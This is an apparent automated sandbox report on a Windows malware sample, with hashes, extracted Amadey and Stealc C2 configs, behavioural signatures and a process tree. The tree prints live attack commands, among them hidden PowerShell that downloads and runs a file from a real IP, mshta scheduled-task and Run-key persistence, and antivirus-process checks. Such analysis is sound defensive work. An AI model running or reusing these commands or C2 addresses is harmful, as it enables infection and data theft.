Analysis

  • max time kernel
    148s
  • max time network
    149s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    26/03/2025, 20:36

General

  • Target

    2025-03-26_6dd7b93ac51efcb83123e106cf6fffff_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe

  • Size

    938KB

  • MD5

    6dd7b93ac51efcb83123e106cf6fffff

  • SHA1

    445c23a47afe65806c0180d43217cdab9927b203

  • SHA256

    221ec52b5b50595fbaf95e8db9137a053f7f1b362e8c62550512393566a69085

  • SHA512

    bc58395c0949d98c1e8737e8d9414d159e8ba6333989f3258acf0852a83e4d99f1f3e2b941290990f4029121215b9811c7fa1f34795253e6e3caca4059844572

  • SSDEEP

    24576:+qDEvCTbMWu7rQYlBQcBiT6rprG8a4Qu:+TvC/MTQYxsWR7a4Q

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

stealc

Botnet

trump

C2

http://45.93.20.28

Attributes
  • url_path

    /85a1cacf11314eb8.php

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • NetSupport

    NetSupport is a remote access tool sold as a legitimate system administration software.

  • Netsupport family
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 6 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Using powershell.exe command.

  • Downloads MZ/PE file 12 IoCs
  • Checks BIOS information in registry 2 TTPs 16 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 25 IoCs
  • Identifies Wine through registry keys 2 TTPs 6 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 56 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Adds Run key to start application 2 TTPs 5 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Enumerates processes with tasklist 1 TTPs 6 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs
  • Drops file in Windows directory 32 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Delays execution with timeout.exe 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 52 IoCs
  • Suspicious use of AdjustPrivilegeToken 13 IoCs
  • Suspicious use of FindShellTrayWindow 17 IoCs
  • Suspicious use of SendNotifyMessage 15 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:1128
      • C:\Users\Admin\AppData\Local\Temp\2025-03-26_6dd7b93ac51efcb83123e106cf6fffff_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
        "C:\Users\Admin\AppData\Local\Temp\2025-03-26_6dd7b93ac51efcb83123e106cf6fffff_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"
        2⤵
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of WriteProcessMemory
        PID:2484
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c schtasks /create /tn KJ5oymaWQTT /tr "mshta C:\Users\Admin\AppData\Local\Temp\4EqD5DME5.hta" /sc minute /mo 25 /ru "Admin" /f
          3⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1872
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /create /tn KJ5oymaWQTT /tr "mshta C:\Users\Admin\AppData\Local\Temp\4EqD5DME5.hta" /sc minute /mo 25 /ru "Admin" /f
            4⤵
            • System Location Discovery: System Language Discovery
            • Scheduled Task/Job: Scheduled Task
            PID:2252
        • C:\Windows\SysWOW64\mshta.exe
          mshta C:\Users\Admin\AppData\Local\Temp\4EqD5DME5.hta
          3⤵
          • System Location Discovery: System Language Discovery
          • Modifies Internet Explorer settings
          • Suspicious use of WriteProcessMemory
          PID:2288
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'K2ZIS9NI4WK9GWZFWKPYVBSRCLG6TSLY.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
            4⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Downloads MZ/PE file
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2456
            • C:\Users\Admin\AppData\Local\TempK2ZIS9NI4WK9GWZFWKPYVBSRCLG6TSLY.EXE
              "C:\Users\Admin\AppData\Local\TempK2ZIS9NI4WK9GWZFWKPYVBSRCLG6TSLY.EXE"
              5⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Loads dropped DLL
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Drops file in Windows directory
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of WriteProcessMemory
              PID:2520
              • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
                6⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Downloads MZ/PE file
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Loads dropped DLL
                • Adds Run key to start application
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of WriteProcessMemory
                PID:2788
                • C:\Users\Admin\AppData\Local\Temp\10343250101\oalJJxv.exe
                  "C:\Users\Admin\AppData\Local\Temp\10343250101\oalJJxv.exe"
                  7⤵
                  • Executes dropped EXE
                  PID:2256
                • C:\Users\Admin\AppData\Local\Temp\10343420101\kZZeUXM.exe
                  "C:\Users\Admin\AppData\Local\Temp\10343420101\kZZeUXM.exe"
                  7⤵
                  • Checks BIOS information in registry
                  • Executes dropped EXE
                  PID:2028
                • C:\Users\Admin\AppData\Local\Temp\10343460101\kZZeUXM.exe
                  "C:\Users\Admin\AppData\Local\Temp\10343460101\kZZeUXM.exe"
                  7⤵
                  • Checks BIOS information in registry
                  • Executes dropped EXE
                  PID:1984
                • C:\Users\Admin\AppData\Local\Temp\10343470101\kDveTWY.exe
                  "C:\Users\Admin\AppData\Local\Temp\10343470101\kDveTWY.exe"
                  7⤵
                  • Executes dropped EXE
                  • Suspicious use of WriteProcessMemory
                  PID:2920
                  • C:\Windows\system32\WerFault.exe
                    C:\Windows\system32\WerFault.exe -u -p 2920 -s 36
                    8⤵
                    • Loads dropped DLL
                    PID:2360
                • C:\Users\Admin\AppData\Local\Temp\10343480101\a6eddbd478.exe
                  "C:\Users\Admin\AppData\Local\Temp\10343480101\a6eddbd478.exe"
                  7⤵
                  • Executes dropped EXE
                  • Suspicious use of WriteProcessMemory
                  PID:1632
                  • C:\Windows\system32\WerFault.exe
                    C:\Windows\system32\WerFault.exe -u -p 1632 -s 64
                    8⤵
                    • Loads dropped DLL
                    PID:816
                • C:\Users\Admin\AppData\Local\Temp\10343490101\dBSGwVB.exe
                  "C:\Users\Admin\AppData\Local\Temp\10343490101\dBSGwVB.exe"
                  7⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:2372
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c ""C:\Users\Public\Netstat\netsup.bat" "
                    8⤵
                    • Loads dropped DLL
                    • System Location Discovery: System Language Discovery
                    • Suspicious use of WriteProcessMemory
                    PID:1864
                    • C:\Windows\SysWOW64\reg.exe
                      REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\bild.exe"
                      9⤵
                      • Adds Run key to start application
                      PID:2828
                    • C:\Users\Public\Netstat\bild.exe
                      C:\Users\Public\Netstat\bild.exe
                      9⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • System Location Discovery: System Language Discovery
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of FindShellTrayWindow
                      PID:2812
                • C:\Users\Admin\AppData\Local\Temp\10343500101\WLbfHbp.exe
                  "C:\Users\Admin\AppData\Local\Temp\10343500101\WLbfHbp.exe"
                  7⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Drops file in Windows directory
                  PID:2752
                  • C:\Windows\SysWOW64\CMD.exe
                    "C:\Windows\system32\CMD.exe" /c copy Edit.vss Edit.vss.bat & Edit.vss.bat
                    8⤵
                    • Loads dropped DLL
                    • System Location Discovery: System Language Discovery
                    PID:2056
                    • C:\Windows\SysWOW64\tasklist.exe
                      tasklist
                      9⤵
                      • Enumerates processes with tasklist
                      • System Location Discovery: System Language Discovery
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2536
                    • C:\Windows\SysWOW64\findstr.exe
                      findstr /I "opssvc wrsa"
                      9⤵
                      • System Location Discovery: System Language Discovery
                      PID:2424
                    • C:\Windows\SysWOW64\tasklist.exe
                      tasklist
                      9⤵
                      • Enumerates processes with tasklist
                      • System Location Discovery: System Language Discovery
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2520
                    • C:\Windows\SysWOW64\findstr.exe
                      findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
                      9⤵
                      • System Location Discovery: System Language Discovery
                      PID:1552
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c md 267978
                      9⤵
                      • System Location Discovery: System Language Discovery
                      PID:1708
                    • C:\Windows\SysWOW64\extrac32.exe
                      extrac32 /Y /E Spanish.vss
                      9⤵
                      • System Location Discovery: System Language Discovery
                      PID:1196
                    • C:\Windows\SysWOW64\findstr.exe
                      findstr /V "East" Removed
                      9⤵
                      • System Location Discovery: System Language Discovery
                      PID:2368
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c copy /b 267978\Exam.com + Vermont + Conflict + Remarks + Safer + Districts + Eddie + Awful + Garage + Sexually + Mitsubishi + Freeware 267978\Exam.com
                      9⤵
                      • System Location Discovery: System Language Discovery
                      PID:1704
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c copy /b ..\Austin.vss + ..\Canal.vss + ..\Cottage.vss + ..\Engineers.vss + ..\Racks.vss + ..\Spy.vss + ..\Weekends.vss + ..\Shirt.vss + ..\Fields.vss + ..\Flyer.vss + ..\Strengthening.vss + ..\Floors.vss j
                      9⤵
                      • System Location Discovery: System Language Discovery
                      PID:1556
                    • C:\Users\Admin\AppData\Local\Temp\267978\Exam.com
                      Exam.com j
                      9⤵
                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                      • Executes dropped EXE
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of FindShellTrayWindow
                      • Suspicious use of SendNotifyMessage
                      PID:2948
                    • C:\Windows\SysWOW64\choice.exe
                      choice /d y /t 5
                      9⤵
                      • System Location Discovery: System Language Discovery
                      PID:1836
                • C:\Users\Admin\AppData\Local\Temp\10343510101\f73ae_003.exe
                  "C:\Users\Admin\AppData\Local\Temp\10343510101\f73ae_003.exe"
                  7⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  PID:1872
                • C:\Users\Admin\AppData\Local\Temp\10343520101\TbV75ZR.exe
                  "C:\Users\Admin\AppData\Local\Temp\10343520101\TbV75ZR.exe"
                  7⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Drops file in Windows directory
                  • System Location Discovery: System Language Discovery
                  PID:1456
                  • C:\Windows\SysWOW64\CMD.exe
                    "C:\Windows\system32\CMD.exe" /c copy Edit.vss Edit.vss.bat & Edit.vss.bat
                    8⤵
                    • Loads dropped DLL
                    PID:2108
                    • C:\Windows\SysWOW64\tasklist.exe
                      tasklist
                      9⤵
                      • Enumerates processes with tasklist
                      • System Location Discovery: System Language Discovery
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2052
                    • C:\Windows\SysWOW64\findstr.exe
                      findstr /I "opssvc wrsa"
                      9⤵
                      • System Location Discovery: System Language Discovery
                      PID:2404
                    • C:\Windows\SysWOW64\tasklist.exe
                      tasklist
                      9⤵
                      • Enumerates processes with tasklist
                      • System Location Discovery: System Language Discovery
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1528
                    • C:\Windows\SysWOW64\findstr.exe
                      findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
                      9⤵
                      • System Location Discovery: System Language Discovery
                      PID:2800
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c md 267978
                      9⤵
                      • System Location Discovery: System Language Discovery
                      PID:1400
                    • C:\Windows\SysWOW64\extrac32.exe
                      extrac32 /Y /E Spanish.vss
                      9⤵
                      • System Location Discovery: System Language Discovery
                      PID:2400
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c copy /b 267978\Exam.com + Vermont + Conflict + Remarks + Safer + Districts + Eddie + Awful + Garage + Sexually + Mitsubishi + Freeware 267978\Exam.com
                      9⤵
                      • System Location Discovery: System Language Discovery
                      PID:2744
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c copy /b ..\Austin.vss + ..\Canal.vss + ..\Cottage.vss + ..\Engineers.vss + ..\Racks.vss + ..\Spy.vss + ..\Weekends.vss + ..\Shirt.vss + ..\Fields.vss + ..\Flyer.vss + ..\Strengthening.vss + ..\Floors.vss j
                      9⤵
                      • System Location Discovery: System Language Discovery
                      PID:2524
                    • C:\Users\Admin\AppData\Local\Temp\267978\Exam.com
                      Exam.com j
                      9⤵
                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                      • Executes dropped EXE
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of FindShellTrayWindow
                      • Suspicious use of SendNotifyMessage
                      PID:1664
                    • C:\Windows\SysWOW64\choice.exe
                      choice /d y /t 5
                      9⤵
                      • System Location Discovery: System Language Discovery
                      PID:1884
                • C:\Users\Admin\AppData\Local\Temp\10343530101\7IIl2eE.exe
                  "C:\Users\Admin\AppData\Local\Temp\10343530101\7IIl2eE.exe"
                  7⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Drops file in Windows directory
                  • System Location Discovery: System Language Discovery
                  PID:2656
                  • C:\Windows\SysWOW64\CMD.exe
                    "C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat
                    8⤵
                    • Loads dropped DLL
                    • System Location Discovery: System Language Discovery
                    PID:2292
                    • C:\Windows\SysWOW64\tasklist.exe
                      tasklist
                      9⤵
                      • Enumerates processes with tasklist
                      • System Location Discovery: System Language Discovery
                      • Suspicious use of AdjustPrivilegeToken
                      PID:3052
                    • C:\Windows\SysWOW64\findstr.exe
                      findstr /I "opssvc wrsa"
                      9⤵
                      • System Location Discovery: System Language Discovery
                      PID:2360
                    • C:\Windows\SysWOW64\tasklist.exe
                      tasklist
                      9⤵
                      • Enumerates processes with tasklist
                      • System Location Discovery: System Language Discovery
                      • Suspicious use of AdjustPrivilegeToken
                      PID:328
                    • C:\Windows\SysWOW64\findstr.exe
                      findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
                      9⤵
                      • System Location Discovery: System Language Discovery
                      PID:2740
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c md 418377
                      9⤵
                      • System Location Discovery: System Language Discovery
                      PID:2588
                    • C:\Windows\SysWOW64\extrac32.exe
                      extrac32 /Y /E Leon.cab
                      9⤵
                      • System Location Discovery: System Language Discovery
                      PID:924
                    • C:\Windows\SysWOW64\findstr.exe
                      findstr /V "BEVERAGES" Compilation
                      9⤵
                      • System Location Discovery: System Language Discovery
                      PID:2796
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c copy /b 418377\Passwords.com + Playing + New + Realized + Uw + Jpeg + Badly + Asbestos + Seeds + Service + Basis + Via 418377\Passwords.com
                      9⤵
                      • System Location Discovery: System Language Discovery
                      PID:2424
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c copy /b ..\Pendant.cab + ..\Visitor.cab + ..\Illegal.cab + ..\Suddenly.cab + ..\Theology.cab + ..\Kidney.cab + ..\Flying.cab + ..\Tigers.cab N
                      9⤵
                      • System Location Discovery: System Language Discovery
                      PID:1672
                    • C:\Users\Admin\AppData\Local\Temp\418377\Passwords.com
                      Passwords.com N
                      9⤵
                      • Executes dropped EXE
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of FindShellTrayWindow
                      • Suspicious use of SendNotifyMessage
                      PID:1188
                    • C:\Windows\SysWOW64\choice.exe
                      choice /d y /t 5
                      9⤵
                      • System Location Discovery: System Language Discovery
                      PID:2828
                • C:\Users\Admin\AppData\Local\Temp\10343540101\BIm18E9.exe
                  "C:\Users\Admin\AppData\Local\Temp\10343540101\BIm18E9.exe"
                  7⤵
                  • Executes dropped EXE
                  • Suspicious behavior: EnumeratesProcesses
                  PID:556
                • C:\Users\Admin\AppData\Local\Temp\10343550101\oalJJxv.exe
                  "C:\Users\Admin\AppData\Local\Temp\10343550101\oalJJxv.exe"
                  7⤵
                  • Executes dropped EXE
                  PID:2108
                • C:\Users\Admin\AppData\Local\Temp\10343560101\3c3eab273a.exe
                  "C:\Users\Admin\AppData\Local\Temp\10343560101\3c3eab273a.exe"
                  7⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of FindShellTrayWindow
                  • Suspicious use of SendNotifyMessage
                  PID:1400
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c schtasks /create /tn oR8jzmakWek /tr "mshta C:\Users\Admin\AppData\Local\Temp\KVADJhQTS.hta" /sc minute /mo 25 /ru "Admin" /f
                    8⤵
                    • System Location Discovery: System Language Discovery
                    PID:1460
                    • C:\Windows\SysWOW64\schtasks.exe
                      schtasks /create /tn oR8jzmakWek /tr "mshta C:\Users\Admin\AppData\Local\Temp\KVADJhQTS.hta" /sc minute /mo 25 /ru "Admin" /f
                      9⤵
                      • System Location Discovery: System Language Discovery
                      • Scheduled Task/Job: Scheduled Task
                      PID:1428
                  • C:\Windows\SysWOW64\mshta.exe
                    mshta C:\Users\Admin\AppData\Local\Temp\KVADJhQTS.hta
                    8⤵
                    • System Location Discovery: System Language Discovery
                    • Modifies Internet Explorer settings
                    PID:2168
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'VMXBMBSZWYUUGUJD1ZASCVZIQHEB1V3N.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                      9⤵
                      • Blocklisted process makes network request
                      • Command and Scripting Interpreter: PowerShell
                      • Downloads MZ/PE file
                      • Loads dropped DLL
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2468
                      • C:\Users\Admin\AppData\Local\TempVMXBMBSZWYUUGUJD1ZASCVZIQHEB1V3N.EXE
                        "C:\Users\Admin\AppData\Local\TempVMXBMBSZWYUUGUJD1ZASCVZIQHEB1V3N.EXE"
                        10⤵
                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                        • Checks BIOS information in registry
                        • Executes dropped EXE
                        • Identifies Wine through registry keys
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        • Suspicious behavior: EnumeratesProcesses
                        PID:868
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c ""C:\Users\Admin\AppData\Local\Temp\10343570121\am_no.cmd" "
                  7⤵
                  • System Location Discovery: System Language Discovery
                  PID:2684
                  • C:\Windows\SysWOW64\timeout.exe
                    timeout /t 2
                    8⤵
                    • System Location Discovery: System Language Discovery
                    • Delays execution with timeout.exe
                    PID:1732
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                    8⤵
                      PID:1716
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                        9⤵
                        • Command and Scripting Interpreter: PowerShell
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1364
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                      8⤵
                      • System Location Discovery: System Language Discovery
                      PID:2036
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                        9⤵
                        • Command and Scripting Interpreter: PowerShell
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2796
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                      8⤵
                      • System Location Discovery: System Language Discovery
                      PID:2808
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                        9⤵
                        • Command and Scripting Interpreter: PowerShell
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2560
                    • C:\Windows\SysWOW64\schtasks.exe
                      schtasks /create /tn "NEvSemazeZB" /tr "mshta \"C:\Temp\aAnhrbTyJ.hta\"" /sc minute /mo 25 /ru "Admin" /f
                      8⤵
                      • System Location Discovery: System Language Discovery
                      • Scheduled Task/Job: Scheduled Task
                      PID:1316
                    • C:\Windows\SysWOW64\mshta.exe
                      mshta "C:\Temp\aAnhrbTyJ.hta"
                      8⤵
                      • System Location Discovery: System Language Discovery
                      • Modifies Internet Explorer settings
                      PID:2860
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                        9⤵
                        • Blocklisted process makes network request
                        • Command and Scripting Interpreter: PowerShell
                        • Downloads MZ/PE file
                        • Loads dropped DLL
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2204
                        • C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
                          "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                          10⤵
                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                          • Checks BIOS information in registry
                          • Executes dropped EXE
                          • Identifies Wine through registry keys
                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                          • Suspicious behavior: EnumeratesProcesses
                          PID:1008
                  • C:\Users\Admin\AppData\Local\Temp\10343580101\22992d86cd.exe
                    "C:\Users\Admin\AppData\Local\Temp\10343580101\22992d86cd.exe"
                    7⤵
                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                    • Checks BIOS information in registry
                    • Executes dropped EXE
                    • Identifies Wine through registry keys
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    PID:1944
                  • C:\Users\Admin\AppData\Local\Temp\10343590101\ac3bccb7d8.exe
                    "C:\Users\Admin\AppData\Local\Temp\10343590101\ac3bccb7d8.exe"
                    7⤵
                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                    • Checks BIOS information in registry
                    • Executes dropped EXE
                    • Identifies Wine through registry keys
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    PID:2316
        • C:\Users\Public\Netstat\bild.exe
          "C:\Users\Public\Netstat\bild.exe"
          2⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:1500
        • C:\Users\Public\Netstat\bild.exe
          "C:\Users\Public\Netstat\bild.exe"
          2⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:1404

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\TempK2ZIS9NI4WK9GWZFWKPYVBSRCLG6TSLY.EXE

        Filesize

        1.8MB

        MD5

        53f24086dc5ae9e8e778e4b6fe6dacac

        SHA1

        86743fc7837b42371aad3aa62660b5351253c53b

        SHA256

        53d4b7a917d975149ee9a757ccbb944e5a7f40814b07108358495bef54e1371d

        SHA512

        42f3b01c4f039995837e2157caf6bada0bb32ecea9ecdc48a92f30b181e741ccd91f1a1de5538f34e3fceb3f13e72b40a6984d513fd421bb1e6dd7561d6ba0cf

      • C:\Users\Admin\AppData\Local\Temp\10343250101\oalJJxv.exe

        Filesize

        9.8MB

        MD5

        9a2147c4532f7fa643ab5792e3fe3d5c

        SHA1

        80244247bc0bc46884054db9c8ddbc6dee99b529

        SHA256

        3e8b13abf977519f8aa7ced613234a39ee1a39e07a2915c60c09713677ecdeba

        SHA512

        c4513062787175cc942cdb0324c1465957bf4d2c48d68a4896daeb427b936ae8d9c78b88f67c456566e8fc32787b1d8b92b3521f7e47e2e90b3f9e10d8498aba

      • C:\Users\Admin\AppData\Local\Temp\10343420101\kZZeUXM.exe

        Filesize

        6.4MB

        MD5

        b5871f405d4fc3d7d7f149d47c3c55c6

        SHA1

        38fdc1e1fcf581764cf23f34e6c6fee7be3228b2

        SHA256

        87a0413f69cc75e47c0720c3af3ab522d2965df2e945bc6f9da03912b2dfd46b

        SHA512

        a6daba1d5b493ed661775a7a9c9cf0266150ee3365cc36ecd1bfca85fb621f6b5744f35dbfbc6f47d870355033334556363f9a8e20772d7f71c12cd07d83c789

      • C:\Users\Admin\AppData\Local\Temp\10343470101\kDveTWY.exe

        Filesize

        1.4MB

        MD5

        fc6cd346462b85853040586c7af71316

        SHA1

        fd2e85e7252fb1f4bfba00c823abed3ec3e501e1

        SHA256

        5a967613fad14a8eb61757b641eb3f84236360e06834800e90e2e28da09da2de

        SHA512

        382d8cb536172bf3d99d28e92d1056d4bcfe96b08109bdffe9e2745b434cd2d301f320ce4ff836bf6bf90c08ba8859fbd36741b3a572d52bfb1f782e86f8d746

      • C:\Users\Admin\AppData\Local\Temp\10343480101\a6eddbd478.exe

        Filesize

        1.1MB

        MD5

        96fa728730da64d7d6049c305c40232c

        SHA1

        3fd03c4f32e3f9dbcc617507a7a842afb668c4de

        SHA256

        28d15f133c8ea7bf4c985207eefdc4c8c324ff2552df730f8861fcc041bc3e93

        SHA512

        c66458fcb654079c4d622aa30536f8fbdef64fe086b8ca5f55813f18cb0d511bc25b846deec80895b303151dfe232ca2f755b0ad54d3bafcf2aec7ff318dbcbe

      • C:\Users\Admin\AppData\Local\Temp\10343490101\dBSGwVB.exe

        Filesize

        13.1MB

        MD5

        79a51197969dadee0226635f5977f6ab

        SHA1

        1785a081523553690d110c4153e3b3c990c08d45

        SHA256

        868c78f267862af83cf94c9d21615d9c01afe3dbd0da02dc96bbc3a956ccc48d

        SHA512

        202ea6d421bb7163ba741267543dff4f97012f2489f694f06555b1bbffec3a59fe71d5675755f5d746727eaf93b6d8204eab4e11fd692cf82570b1edf8a80a55

      • C:\Users\Admin\AppData\Local\Temp\10343500101\WLbfHbp.exe

        Filesize

